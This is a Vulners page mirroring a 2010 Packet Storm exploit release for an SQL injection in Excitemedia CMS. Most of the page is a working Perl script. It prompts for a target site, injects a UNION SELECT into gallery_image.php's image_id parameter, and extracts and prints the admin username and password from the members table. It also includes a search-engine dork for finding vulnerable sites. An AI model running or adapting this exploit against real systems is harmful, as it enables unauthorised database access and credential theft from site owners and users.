Lucene search
K

Excitemedia CMS SQL Injection

🗓️ 23 Apr 2010 00:00:00Reported by Cr3w-DType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Excitemedia CMS SQL Injection vulnerability, N.A.S.T, vx3[at]hotmail.de, cr3w[at]hotmail.d

Code
`  
  
  
#!/usr/bin/perl -w  
  
# Excitemedia CMS Sql injection vulnerability #  
########################################  
#[+] Author : Dr.0rYX AND Cr3W-DZ  
#[+] Greetz : HIS0K4 - CLAW and all the other friends  
#[+] inurl:”gallery_image.php?image_id=”  
########################################  
print "\t\t| NORTH-AFRICA SECURITY TEAM |\n\n";  
print "[x] Dr.0rYX AND Cr3W-DZ\n\n";  
print "[x] N.A.S.T\n\n";  
print "[x] Excitemedia Cms Sql injection vulnerability\n\n";  
print "[x] www.nasteam.wordpress.com\n\n";  
print "\t\t| vx3[at]hotmail.de |\n\n";  
print "\t\t| cr3w[at]hotmail.de |\n\n";  
use LWP::UserAgent;  
print "\nTarget page:[http://site/path/]: ";  
chomp(my $target=<STDIN>);  
$column_name="concat(0x757365723d,username,0x3a,0x70617373776f72643d,password)";  
$table_name="members";  
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
$host = $target."/gallery_image.php?image_id=1 and 1=0 union select 1,2,".$column_name.",4,5,6,7,8 from ".$table_name." limit 0,1--";  
$res = $b->request(HTTP::Request->new(GET=>$host));  
$answer = $res->content; if ($answer =~ /user=(.*?):/){  
print "\n[+] Admin username : $1\n\n";  
}  
else{print "\nError\n";  
}  
$answer = $res->content; if ($answer =~ /password=(.*?)<\/div>/){  
print "\n[+] Admin password : $1\n\n";  
}  
else{print "\nError\n";  
}   
_________________________________________________________________  
Hotmail : une messagerie fiable avec la protection anti-spam performante de Microsoft  
https://signup.live.com/signup.aspx?id=60969  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation